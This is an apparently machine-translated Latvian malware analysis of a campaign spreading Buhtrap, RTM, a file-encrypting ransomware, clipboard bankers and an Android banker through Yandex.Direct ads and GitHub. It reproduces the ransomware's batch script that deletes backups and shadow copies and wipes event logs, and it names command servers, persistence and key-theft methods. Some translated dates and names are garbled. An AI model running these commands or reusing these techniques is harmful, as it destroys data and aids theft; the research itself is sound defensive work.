Aizmugurējās durvis un Buhtrap Å”ifrētājs tika izplatÄ«ti, izmantojot Yandex.Direct

Lai vērstos pret grāmatvežiem kiberuzbrukumā, varat izmantot darba dokumentus, kurus viņi meklē tieÅ”saistē. Tas ir aptuveni tas, ko kibergrupa ir darÄ«jusi pēdējo mēneÅ”u laikā, izplatot zināmas aizmugures durvis. Buhtrap Šø RTM, kā arÄ« Å”ifrētāji un programmatÅ«ra kriptovalÅ«tu zagÅ”anai. Lielākā daļa mērÄ·u atrodas Krievijā. Uzbrukums tika veikts, ievietojot ļaunprātÄ«gu reklāmu vietnē Yandex.Direct. Potenciālie upuri tika novirzÄ«ti uz vietni, kurā viņiem tika lÅ«gts lejupielādēt ļaunprātÄ«gu failu, kas bija maskēts kā dokumenta veidne. Yandex pēc mÅ«su brÄ«dinājuma noņēma ļaunprātÄ«go reklāmu.

Buhtrap avota kods iepriekÅ” ir nopludināts tieÅ”saistē, lai ikviens varētu to izmantot. Mums nav informācijas par RTM koda pieejamÄ«bu.

Šajā ziņojumā mēs jums pastāstīsim, kā uzbrucēji izplatīja ļaunprātīgu programmatūru, izmantojot Yandex.Direct, un mitināja to vietnē GitHub. Ziņa noslēgsies ar ļaunprātīgas programmatūras tehnisko analīzi.

Aizmugurējās durvis un Buhtrap Å”ifrētājs tika izplatÄ«ti, izmantojot Yandex.Direct

Buhtrap un RTM atgriežas biznesā

IzplatīŔanās mehānisms un upuri

Dažādajām upuriem piegādātajām kravām ir kopÄ«gs izplatÄ«Å”anas mehānisms. Visi uzbrucēju izveidotie ļaunprātÄ«gie faili tika ievietoti divās dažādās GitHub krātuvēs.

Parasti repozitorijā bija viens lejupielādējams ļaunprātÄ«gs fails, kas bieži mainÄ«jās. Tā kā GitHub ļauj skatÄ«t repozitorija izmaiņu vēsturi, mēs varam redzēt, kāda ļaunprātÄ«ga programmatÅ«ra tika izplatÄ«ta noteiktā laika posmā. Lai pārliecinātu upuri lejupielādēt ļaunprātÄ«go failu, tika izmantota vietne blanki-shabloni24[.]ru, kas parādÄ«ta attēlā iepriekÅ”.

Vietnes dizains un visi ļaundabÄ«go failu nosaukumi ir veidoti pēc vienota koncepcijas ā€“ veidlapas, veidnes, lÄ«gumi, paraugi utt. Ņemot vērā, ka Buhtrap un RTM programmatÅ«ra jau iepriekÅ” ir izmantota uzbrukumos grāmatvežiem, mēs pieņēmām, ka stratēģija jaunajā kampaņā ir tāda pati. Jautājums ir tikai par to, kā upuris nokļuva uzbrucēju vietnē.

Infekcija

Vismaz vairākus potenciālos upurus, kas nokļuva Å”ajā vietnē, piesaistÄ«ja ļaunprātÄ«ga reklāma. Zemāk ir URL piemērs:

https://blanki-shabloni24.ru/?utm_source=yandex&utm_medium=banner&utm_campaign=cid|{blanki_rsya}|context&utm_content=gid|3590756360|aid|6683792549|15114654950_&utm_term=сŠŗŠ°Ń‡Š°Ń‚ŃŒ Š±Š»Š°Š½Šŗ счŠµŃ‚Š°&pm_source=bb.f2.kz&pm_block=none&pm_position=0&yclid=1029648968001296456

Kā redzat no saites, reklāmkarogs tika ievietots likumÄ«gā grāmatvedÄ«bas forumā bb.f2[.]kz. Ir svarÄ«gi atzÄ«mēt, ka baneri parādÄ«jās dažādās vietnēs, visiem bija vienāds kampaņas ID (blanki_rsya) un lielākā daļa bija saistÄ«ti ar grāmatvedÄ«bas vai juridiskās palÄ«dzÄ«bas pakalpojumiem. URL parāda, ka potenciālais upuris izmantoja pieprasÄ«jumu ā€œlejupielādēt rēķina veidlapuā€, kas apstiprina mÅ«su hipotēzi par mērÄ·tiecÄ«giem uzbrukumiem. Tālāk ir norādÄ«tas vietnes, kurās parādÄ«jās baneri, un atbilstoÅ”ie meklÄ“Å”anas vaicājumi.

  • lejupielādēt rēķina veidlapu ā€“ bb.f2[.]kz
  • lÄ«guma paraugs - Ipopen[.]ru
  • iesnieguma sÅ«dzÄ«bas paraugs - 77metrov[.]ru
  • lÄ«guma veidlapa - blank-dogovor-kupli-prodazhi[.]ru
  • tiesas lÅ«guma paraugs - zen.yandex[.]ru
  • sÅ«dzÄ«bas paraugs - yurday[.]ru
  • lÄ«guma veidlapu paraugi ā€“ Regforum[.]ru
  • lÄ«guma veidlapa ā€“ assistentus[.]ru
  • dzÄ«vokļa lÄ«guma paraugs ā€“ napravah[.]com
  • juridisko lÄ«gumu paraugi - avito[.]ru

Vietne blanki-shabloni24[.]ru, iespējams, ir konfigurēta, lai izturētu vienkārÅ”u vizuālu novērtējumu. Parasti reklāma, kas norāda uz profesionāla izskata vietni ar saiti uz GitHub, neŔķiet kaut kas acÄ«mredzami slikts. Turklāt uzbrucēji krātuvē augÅ”upielādēja ļaunprātÄ«gus failus tikai ierobežotu laiku, iespējams, kampaņas laikā. Lielāko daļu laika GitHub repozitorijā bija tukÅ”s zip arhÄ«vs vai tukÅ”s EXE fails. Tādējādi uzbrucēji varēja izplatÄ«t reklāmu, izmantojot Yandex.Direct vietnēs, kuras, visticamāk, apmeklēja grāmatveži, kuri ieradās, atbildot uz konkrētiem meklÄ“Å”anas vaicājumiem.

Tālāk apskatīsim dažādās Ŕādā veidā sadalītās kravnesības.

Kravas slodzes analīze

Izplatības hronoloģija

Ä»aunprātÄ«gā kampaņa sākās 2018. gada oktobra beigās un ir aktÄ«va rakstÄ«Å”anas laikā. Tā kā visa krātuve bija publiski pieejama vietnē GitHub, mēs sastādÄ«jām precÄ«zu seÅ”u dažādu ļaunprātÄ«gas programmatÅ«ras Ä£imeņu izplatÄ«Å”anas laika grafiku (skatiet attēlu zemāk). SalÄ«dzinājumam ar Git vēsturi esam pievienojuÅ”i rindiņu, kurā norādÄ«ts, kad reklāmkaroga saite tika atklāta, ko mēra ar ESET telemetriju. Kā redzat, tas labi korelē ar lietderÄ«gās slodzes pieejamÄ«bu vietnē GitHub. NeatbilstÄ«ba februāra beigās ir izskaidrojama ar to, ka mums nebija daļa no izmaiņu vēstures, jo repozitorijs tika noņemts no GitHub, pirms mēs to varējām iegÅ«t pilnÄ«bā.

Aizmugurējās durvis un Buhtrap Å”ifrētājs tika izplatÄ«ti, izmantojot Yandex.Direct
1. attēls. Ä»aunprātÄ«go programmu izplatÄ«Å”anas hronoloÄ£ija.

Kodu parakstīŔanas sertifikāti

Kampaņai tika izmantoti vairāki sertifikāti. Dažus no tiem parakstÄ«ja vairāk nekā viena ļaunprātÄ«gas programmatÅ«ras saime, kas vēl vairāk norāda, ka vienai kampaņai piederēja dažādi paraugi. Neskatoties uz privātās atslēgas pieejamÄ«bu, operatori sistemātiski neparakstÄ«ja bināros failus un neizmantoja atslēgu visiem paraugiem. 2019. gada februāra beigās uzbrucēji sāka veidot nederÄ«gus parakstus, izmantojot Google piederoÅ”u sertifikātu, kuram viņiem nebija privātās atslēgas.

Visi kampaņā iesaistītie sertifikāti un to parakstītās ļaunprātīgas programmatūras saimes ir norādītas tabulā zemāk.

Aizmugurējās durvis un Buhtrap Å”ifrētājs tika izplatÄ«ti, izmantojot Yandex.Direct

Mēs esam arÄ« izmantojuÅ”i Å”os koda parakstÄ«Å”anas sertifikātus, lai izveidotu saites ar citām ļaunprātÄ«gas programmatÅ«ras Ä£imenēm. Lielākajai daļai sertifikātu mēs neatradām paraugus, kas nebÅ«tu izplatÄ«ti caur GitHub krātuvi. Tomēr TOV ā€œMARIYAā€ sertifikāts tika izmantots, lai parakstÄ«tu ļaunprātÄ«gu programmatÅ«ru, kas pieder robottÄ«klam Wauchos, reklāmprogrammatÅ«ra un kalnrači. Maz ticams, ka Ŕī ļaunprogrammatÅ«ra ir saistÄ«ta ar Å”o kampaņu. Visticamāk, sertifikāts tika iegādāts tumÅ”ajā tÄ«klā.

Win32/Filecoder.Buhtrap

Pirmais komponents, kas pievērsa mÅ«su uzmanÄ«bu, bija jaunatklātais Win32/Filecoder.Buhtrap. Å is ir Delphi binārais fails, kas dažkārt tiek iepakots. Tas galvenokārt tika izplatÄ«ts 2019. gada februārÄ«ā€“martā. Tā darbojas kā pienākas izspiedējvÄ«rusu programmai ā€“ tā meklē vietējos diskos un tÄ«kla mapes un Å”ifrē atrastos failus. Tam nav nepiecieÅ”ams interneta savienojums, lai tas tiktu apdraudēts, jo tas nesazinās ar serveri, lai nosÅ«tÄ«tu Å”ifrÄ“Å”anas atslēgas. Tā vietā izpirkuma ziņojuma beigās tiek pievienots ā€œÅ¾etonsā€ un tiek ieteikts izmantot e-pastu vai Bitmessage, lai sazinātos ar operatoriem.

Lai Å”ifrētu pēc iespējas vairāk sensitÄ«vu resursu, Filecoder.Buhtrap vada pavedienu, kas paredzēts atslēgas programmatÅ«ras izslēgÅ”anai, kurai var bÅ«t atvērti failu apdarinātāji, kas satur vērtÄ«gu informāciju, kas varētu traucēt Å”ifrÄ“Å”anu. MērÄ·a procesi galvenokārt ir datu bāzes pārvaldÄ«bas sistēmas (DBVS). Turklāt Filecoder.Buhtrap dzÄ“Å” žurnālfailus un dublējumkopijas, lai apgrÅ«tinātu datu atkopÅ”anu. Lai to izdarÄ«tu, palaidiet tālāk norādÄ«to pakeÅ”u skriptu.

bcdedit /set {default} bootstatuspolicy ignoreallfailures
bcdedit /set {default} recoveryenabled no
wbadmin delete catalog -quiet
wbadmin delete systemstatebackup
wbadmin delete systemstatebackup -keepversions:0
wbadmin delete backup
wmic shadowcopy delete
vssadmin delete shadows /all /quiet
reg delete "HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientDefault" /va /f
reg delete "HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientServers" /f
reg add "HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientServers"
attrib "%userprofile%documentsDefault.rdp" -s -h
del "%userprofile%documentsDefault.rdp"
wevtutil.exe clear-log Application
wevtutil.exe clear-log Security
wevtutil.exe clear-log System
sc config eventlog start=disabled

Filecoder.Buhtrap izmanto likumÄ«gu tieÅ”saistes IP reÄ£istrētāja pakalpojumu, kas paredzēts informācijas apkopoÅ”anai par vietnes apmeklētājiem. Tas ir paredzēts, lai izsekotu izspiedējvÄ«rusa upurus, par ko ir atbildÄ«ga komandrinda:

mshta.exe "javascript:document.write('');"

Å ifrÄ“Å”anai paredzētie faili tiek atlasÄ«ti, ja tie neatbilst trim izslēgÅ”anas sarakstiem. Pirmkārt, netiek Å”ifrēti faili ar Ŕādiem paplaÅ”inājumiem: .com, .cmd, .cpl, .dll, .exe, .hta, .lnk, .msc, .msi, .msp, .pif, .scr, .sys un .sikspārnis. Otrkārt, tiek izslēgti visi faili, kuru pilnais ceļŔ satur direktoriju virknes no zemāk esoŔā saraksta.

.{ED7BA470-8E54-465E-825C-99712043E01C}
tor browser
opera
opera software
mozilla
mozilla firefox
internet explorer
googlechrome
google
boot
application data
apple computersafari
appdata
all users
:windows
:system volume information
:nvidia
:intel

TreÅ”kārt, daži failu nosaukumi arÄ« tiek izslēgti no Å”ifrÄ“Å”anas, tostarp izpirkuma ziņojuma faila nosaukums. Saraksts ir parādÄ«ts zemāk. AcÄ«mredzot visi Å”ie izņēmumi ir paredzēti, lai maŔīna darbotos, taču ar minimālu tehnisko apkopi.

boot.ini
bootfont.bin
bootsect.bak
desktop.ini
iconcache.db
ntdetect.com
ntldr
ntuser.dat
ntuser.dat.log
ntuser.ini
thumbs.db
winupas.exe
your files are now encrypted.txt
windows update assistant.lnk
master.exe
unlock.exe
unlocker.exe

Failu Å”ifrÄ“Å”anas shēma

Kad ļaunprogrammatÅ«ra ir izpildÄ«ta, tā Ä£enerē 512 bitu RSA atslēgu pāri. Privātais eksponents (d) un modulis (n) pēc tam tiek Å”ifrēti ar cieti kodētu 2048 bitu publisko atslēgu (publiskais eksponents un modulis), zlib pakotne un base64 kodēta. Par to atbildÄ«gais kods ir parādÄ«ts 2. attēlā.

Aizmugurējās durvis un Buhtrap Å”ifrētājs tika izplatÄ«ti, izmantojot Yandex.Direct
2. attēls. 512 bitu RSA atslēgu pāru Ä£enerÄ“Å”anas procesa Hex-Rays dekompilācijas rezultāts.

Tālāk ir sniegts vienkārÅ”a teksta piemērs ar Ä£enerētu privāto atslēgu, kas ir marÄ·ieris, kas pievienots izpirkuma ziņojumam.

DF9228F4F3CA93314B7EE4BEFC440030665D5A2318111CC3FE91A43D781E3F91BD2F6383E4A0B4F503916D75C9C576D5C2F2F073ADD4B237F7A2B3BF129AE2F399197ECC0DD002D5E60C20CE3780AB9D1FE61A47D9735036907E3F0CF8BE09E3E7646F8388AAC75FF6A4F60E7F4C2F697BF6E47B2DBCDEC156EAD854CADE53A239

Uzbrucēju publiskā atslēga ir norādīta zemāk.

e = 0x72F750D7A93C2C88BFC87AD4FC0BF4CB45E3C55701FA03D3E75162EB5A97FDA7ACF8871B220A33BEDA546815A9AD9AA0C2F375686F5009C657BB3DF35145126C71E3C2EADF14201C8331699FD0592C957698916FA9FEA8F0B120E4296193AD7F3F3531206608E2A8F997307EE7D14A9326B77F1B34C4F1469B51665757AFD38E88F758B9EA1B95406E72B69172A7253F1DFAA0FA02B53A2CC3A7F0D708D1A8CAA30D954C1FEAB10AD089EFB041DD016DCAAE05847B550861E5CACC6A59B112277B60AC0E4E5D0EA89A5127E93C2182F77FDA16356F4EF5B7B4010BCCE1B1331FCABFFD808D7DAA86EA71DFD36D7E701BD0050235BD4D3F20A97AAEF301E785005
n = 0x212ED167BAC2AEFF7C3FA76064B56240C5530A63AB098C9B9FA2DE18AF9F4E1962B467ABE2302C818860F9215E922FC2E0E28C0946A0FC746557722EBB35DF432481AC7D5DDF69468AF1E952465E61DDD06CDB3D924345A8833A7BC7D5D9B005585FE95856F5C44EA917306415B767B684CC85E7359C23231C1DCBBE714711C08848BEB06BD287781AEB53D94B7983EC9FC338D4320129EA4F568C410317895860D5A85438B2DA6BB3BAAE9D9CE65BCEA6760291D74035775F28DF4E6AB1A748F78C68AB07EA166A7309090202BB3F8FBFC19E44AC0B4D3D0A37C8AA5FA90221DA7DB178F89233E532FF90B55122B53AB821E1A3DB0F02524429DEB294B3A4EDD

Faili tiek Å”ifrēti, izmantojot AES-128-CBC ar 256 bitu atslēgu. Katram Å”ifrētajam failam tiek Ä£enerēta jauna atslēga un jauns inicializācijas vektors. Galvenā informācija tiek pievienota Å”ifrētā faila beigās. ApskatÄ«sim Å”ifrētā faila formātu.
Å ifrētajiem failiem ir Ŕāda galvene:

Aizmugurējās durvis un Buhtrap Å”ifrētājs tika izplatÄ«ti, izmantojot Yandex.Direct

Avota faila dati, pievienojot VEGA maÄ£isko vērtÄ«bu, tiek Å”ifrēti lÄ«dz pirmajiem 0x5000 baitiem. Visa atÅ”ifrÄ“Å”anas informācija ir pievienota failam ar Ŕādu struktÅ«ru:

Aizmugurējās durvis un Buhtrap Å”ifrētājs tika izplatÄ«ti, izmantojot Yandex.Direct

- Faila lieluma marķieris satur atzīmi, kas norāda, vai fails ir lielāks par 0x5000 baitiem
ā€” AES atslēgas lāse = ZlibCompress (RSAEncrypt (AES atslēga + IV, Ä£enerētā RSA atslēgu pāra publiskā atslēga))
- RSA atslēgas lāse = ZlibCompress (RSAEncrypt (ģenerēta RSA privātā atslēga, cietā kodēta RSA publiskā atslēga))

Win32/ClipBanker

Win32/ClipBanker ir komponents, kas tika izplatÄ«ts ar pārtraukumiem no 2018. gada oktobra beigām lÄ«dz decembra sākumam. Tās uzdevums ir uzraudzÄ«t starpliktuves saturu, tā meklē kriptovalÅ«tu maku adreses. Pēc mērÄ·a maka adreses noteikÅ”anas ClipBanker to aizstāj ar adresi, kas, domājams, pieder operatoriem. MÅ«su pārbaudÄ«tie paraugi nebija ne iesaiņoti, ne aptumÅ”oti. VienÄ«gais mehānisms, ko izmanto uzvedÄ«bas maskÄ“Å”anai, ir virkņu Å”ifrÄ“Å”ana. Operatora maka adreses tiek Å”ifrētas, izmantojot RC4. MērÄ·a kriptovalÅ«tas ir Bitcoin, Bitcoin cash, Dogecoin, Ethereum un Ripple.

Laikā, kad ļaunprogrammatÅ«ra izplatÄ«jās uz uzbrucēju Bitcoin makiem, neliela summa tika nosÅ«tÄ«ta VTS, kas liek Å”aubÄ«ties par kampaņas panākumiem. Turklāt nav pierādÄ«jumu, kas liecinātu, ka Å”ie darÄ«jumi vispār bÅ«tu saistÄ«ti ar ClipBanker.

Win32/RTM

32. gada marta sākumā Win2019/RTM komponents tika izplatÄ«ts vairākas dienas. RTM ir Delfos rakstÄ«ts Trojas baņķieris, kas paredzēts attālinātām banku sistēmām. 2017. gadā ESET pētnieki publicēja detalizēta analÄ«ze Ŕīs programmas apraksts joprojām ir aktuāls. 2019. gada janvārÄ« izlaida arÄ« Palo Alto Networks emuāra ieraksts par RTM.

Buhtrap iekrāvējs

Kādu laiku vietnē GitHub bija pieejams lejupielādētājs, kas nebija lÄ«dzÄ«gs iepriekŔējiem Buhtrap rÄ«kiem. ViņŔ pievērÅ”as https://94.100.18[.]67/RSS.php?<some_id> lai iegÅ«tu nākamo posmu un ielādētu to tieÅ”i atmiņā. Mēs varam atŔķirt divas otrā posma koda darbÄ«bas. Pirmajā vietrādÄ« URL RSS.php tieÅ”i nodeva Buhtrap aizmugures durvis ā€” Ŕīs aizmugures durvis ir ļoti lÄ«dzÄ«gas tai, kas bija pieejama pēc avota koda noplÅ«des.

Interesanti, ka mēs redzam vairākas kampaņas ar Buhtrap aizmugures durvÄ«m, un tās it kā vada dažādi operatori. Å ajā gadÄ«jumā galvenā atŔķirÄ«ba ir tā, ka aizmugures durvis tiek ielādētas tieÅ”i atmiņā un neizmanto parasto shēmu ar DLL izvietoÅ”anas procesu, par kuru mēs runājām. pirms tam. Turklāt operatori mainÄ«ja RC4 atslēgu, ko izmanto, lai Å”ifrētu tÄ«kla trafiku uz C&C serveri. Lielākajā daļā mÅ«su redzēto kampaņu operatori neuztraucās mainÄ«t Å”o atslēgu.

Otra, sarežģītāka darbÄ«ba bija tāda, ka RSS.php URL tika nodots citam ielādētājam. Tas ieviesa zināmu neskaidrÄ«bu, piemēram, dinamiskās importÄ“Å”anas tabulas pārbÅ«vi. Bootloader mērÄ·is ir sazināties ar C&C serveri msiofficeupd[.]com/api/F27F84EDA4D13B15/2, nosÅ«tiet žurnālus un gaidiet atbildi. Tas apstrādā atbildi kā lāse, ielādē to atmiņā un izpilda. LietderÄ«gā krava, ko redzējām izpildot Å”o iekrāvēju, bija tā pati Buhtrap aizmugures durvis, taču var bÅ«t arÄ« citas sastāvdaļas.

Android/Spy.Banker

Interesanti, ka GitHub repozitorijā tika atrasts arÄ« komponents Android ierÄ«cēm. ViņŔ galvenajā filiālē bija tikai vienu dienu - 1. gada 2018. novembrÄ«. Papildus tam, ka ESET telemetrija ir publicēta vietnē GitHub, tā neatrod nekādus pierādÄ«jumus par Ŕīs ļaunprātÄ«gās programmatÅ«ras izplatÄ«Å”anu.

Komponents tika mitināts kā Android lietojumprogrammu pakotne (APK). Tas ir ļoti apmulsis. Ä»aunprātÄ«ga darbÄ«ba ir paslēpta Å”ifrētā JAR, kas atrodas APK. Tas ir Å”ifrēts ar RC4, izmantojot Å”o atslēgu:

key = [
0x87, 0xd6, 0x2e, 0x66, 0xc5, 0x8a, 0x26, 0x00, 0x72, 0x86, 0x72, 0x6f,
0x0c, 0xc1, 0xdb, 0xcb, 0x14, 0xd2, 0xa8, 0x19, 0xeb, 0x85, 0x68, 0xe1,
0x2f, 0xad, 0xbe, 0xe3, 0xb9, 0x60, 0x9b, 0xb9, 0xf4, 0xa0, 0xa2, 0x8b, 0x96
]

Virkņu Å”ifrÄ“Å”anai tiek izmantota tā pati atslēga un algoritms. JAR atrodas APK_ROOT + image/files. Pirmie 4 faila baiti satur Å”ifrētā JAR garumu, kas sākas uzreiz aiz garuma lauka.

Pēc faila atÅ”ifrÄ“Å”anas mēs atklājām, ka tas bija Anubis ā€” iepriekÅ” dokumentēts baņķieris Android ierÄ«cēm. Ä»aunprātÄ«gai programmatÅ«rai ir Ŕādas funkcijas:

  • mikrofona ierakstÄ«Å”ana
  • ekrānuzņēmumu uzņemÅ”ana
  • iegÅ«t GPS koordinātas
  • taustiņu bloķētājs
  • ierÄ«ces datu Å”ifrÄ“Å”ana un izpirkuma maksas pieprasÄ«jums
  • surogātpasta sÅ«tÄ«Å”ana

Interesanti, ka baņķieris izmantoja Twitter kā rezerves saziņas kanālu, lai iegūtu citu C&C serveri. Mūsu analizētajā paraugā tika izmantots @JonesTrader konts, taču analīzes laikā tas jau bija bloķēts.

Baņķieris satur Android ierÄ«ces mērÄ·a lietojumprogrammu sarakstu. Tas ir garāks par Sophos pētÄ«jumā iegÅ«to sarakstu. Sarakstā ir iekļautas daudzas banku lietojumprogrammas, tieÅ”saistes iepirkÅ”anās programmas, piemēram, Amazon un eBay, un kriptovalÅ«tu pakalpojumi.

MSIL/ClipBanker.IH

Pēdējais komponents, kas tika izplatÄ«ts Ŕīs kampaņas ietvaros, bija .NET Windows izpildāmais fails, kas parādÄ«jās 2019. gada martā. Lielākā daļa pētÄ«to versiju bija iesaiņotas ar ConfuserEx v1.0.0. Tāpat kā ClipBanker, Å”is komponents izmanto starpliktuvi. Viņa mērÄ·is ir plaÅ”s kriptovalÅ«tu klāsts, kā arÄ« piedāvājumi Steam. Turklāt viņŔ izmanto pakalpojumu IP Logger, lai nozagtu Bitcoin privāto WIF atslēgu.

Aizsardzības mehānismi
Papildus priekÅ”rocÄ«bām, ko sniedz ConfuserEx, novērÅ”ot atkļūdoÅ”anu, izmeÅ”anu un iejaukÅ”anos, komponents ietver iespēju noteikt pretvÄ«rusu produktus un virtuālās maŔīnas.

Lai pārbaudÄ«tu, vai tā darbojas virtuālajā maŔīnā, ļaunprātÄ«gā programmatÅ«ra izmanto iebÅ«vēto Windows WMI komandrindu (WMIC), lai pieprasÄ«tu BIOS informāciju, proti:

wmic bios

Pēc tam programma parsē komandas izvadi un meklē atslēgvārdus: VBOX, VirtualBox, XEN, qemu, bochs, VM.

Lai noteiktu pretvÄ«rusu produktus, ļaunprātÄ«ga programmatÅ«ra nosÅ«ta Windows pārvaldÄ«bas instrumentācijas (WMI) pieprasÄ«jumu uz Windows droŔības centru, izmantojot ManagementObjectSearcher API, kā parādÄ«ts zemāk. Pēc dekodÄ“Å”anas no base64 zvans izskatās Ŕādi:

ManagementObjectSearcher('rootSecurityCenter2', 'SELECT * FROM AntivirusProduct')

Aizmugurējās durvis un Buhtrap Å”ifrētājs tika izplatÄ«ti, izmantojot Yandex.Direct
3. attēls. PretvÄ«rusu produktu identificÄ“Å”anas process.

Turklāt ļaunprogrammatÅ«ra pārbauda, ā€‹ā€‹vai CryptoClipWatcher, rÄ«ks, kas aizsargā pret starpliktuves uzbrukumiem un, ja tas darbojas, aptur visus pavedienus Å”ajā procesā, tādējādi atspējojot aizsardzÄ«bu.

Noturība

Ä»aunprātÄ«gās programmatÅ«ras versija, kuru mēs pētÄ«jām, kopē sevi %APPDATA%googleupdater.exe un iestata google direktorija atribÅ«tu ā€œslēptsā€. Tad viņa maina vērtÄ«bu SoftwareMicrosoftWindows NTCurrentVersionWinlogonshell Windows reÄ£istrā un pievieno ceļu updater.exe. Tādā veidā ļaunprogrammatÅ«ra tiks izpildÄ«ta katru reizi, kad lietotājs pieteiksies.

Ļaunprātīga uzvedība

Tāpat kā ClipBanker, ļaunprogrammatÅ«ra uzrauga starpliktuves saturu un meklē kriptovalÅ«tas maka adreses un, kad tiek atrasta, aizstāj to ar vienu no operatora adresēm. Tālāk ir norādÄ«ts mērÄ·a adreÅ”u saraksts, pamatojoties uz kodā atrodamo.

BTC_P2PKH, BTC_P2SH, BTC_BECH32, BCH_P2PKH_CashAddr, BTC_GOLD, LTC_P2PKH, LTC_BECH32, LTC_P2SH_M, ETH_ERC20, XMR, DCR, XRP, DOGE, DASH, ZEC_T_ADDR, ZEC_Z_ADDR, STELLAR, NEO, ADA, IOTA, NANO_1, NANO_3, BANANO_1, BANANO_3, STRATIS, NIOBIO, LISK, QTUM, WMZ, WMX, WME, VERTCOIN, TRON, TEZOS, QIWI_ID, YANDEX_ID, NAMECOIN, B58_PRIVATEKEY, STEAM_URL

Katram adreses veidam ir atbilstoÅ”a regulārā izteiksme. STEAM_URL vērtÄ«ba tiek izmantota, lai uzbruktu Steam sistēmai, kā redzams no regulārās izteiksmes, kas tiek izmantota, lai definētu buferÄ«:

b(https://|http://|)steamcommunity.com/tradeoffer/new/?partner=[0-9]+&token=[a-zA-Z0-9]+b

Eksfiltrācijas kanāls

Papildus adreÅ”u aizstāŔanai buferÄ« ļaunprogrammatÅ«ra ir vērsta uz Bitcoin, Bitcoin Core un Electrum Bitcoin maku privātajām WIF atslēgām. Programma izmanto vietni plogger.org kā izfiltrÄ“Å”anas kanālu, lai iegÅ«tu WIF privāto atslēgu. Lai to izdarÄ«tu, operatori pievieno privātās atslēgas datus User-Agent HTTP galvenē, kā parādÄ«ts tālāk.

Aizmugurējās durvis un Buhtrap Å”ifrētājs tika izplatÄ«ti, izmantojot Yandex.Direct
4. attēls. IP reģistrētāja konsole ar izvades datiem.

Operatori neizmantoja vietni iplogger.org, lai izfiltrētu makus. Viņi, iespējams, izmantoja citu metodi, jo laukā ir 255 rakstzÄ«mju ierobežojums User-AgentparādÄ«ts IP Logger tÄ«mekļa saskarnē. MÅ«su pētÄ«tajos paraugos otrs izvades serveris tika saglabāts vides mainÄ«gajā DiscordWebHook. PārsteidzoÅ”i, Å”is vides mainÄ«gais kodā nav pieŔķirts nekur. Tas liecina, ka ļaunprogrammatÅ«ra joprojām ir izstrādes stadijā un mainÄ«gais ir pieŔķirts operatora testa iekārtai.

Ir vēl viena pazÄ«me, ka programma ir izstrādes stadijā. Binārajā failā ir iekļauti divi iplogger.org vietrāži URL, un abi tiek vaicāti, kad dati tiek izfiltrēti. PieprasÄ«jumā vienam no Å”iem URL laukā Referer vērtÄ«bas priekŔā ir ā€œDEV /ā€. Mēs atradām arÄ« versiju, kas nebija iepakota, izmantojot ConfuserEx. Å Ä« URL adresāts ir DevFeedbackUrl. Pamatojoties uz vides mainÄ«gā nosaukumu, mēs uzskatām, ka operatori plāno izmantot likumÄ«go pakalpojumu Discord un tā tÄ«mekļa pārtverÅ”anas sistēmu, lai nozagtu kriptovalÅ«tas makus.

Secinājums

Å Ä« kampaņa ir piemērs likumÄ«gu reklāmas pakalpojumu izmantoÅ”anai kiberuzbrukumos. Shēma ir vērsta pret Krievijas organizācijām, taču mēs nebÅ«tu pārsteigti, redzot Ŕādu uzbrukumu, izmantojot pakalpojumus, kas nav krievi. Lai izvairÄ«tos no kompromisiem, lietotājiem ir jābÅ«t pārliecinātiem par lejupielādētās programmatÅ«ras avota reputāciju.

Pilns kompromisa un MITER ATT&CK atribūtu indikatoru saraksts ir pieejams vietnē saite.

Avots: www.habr.com

Pievieno komentāru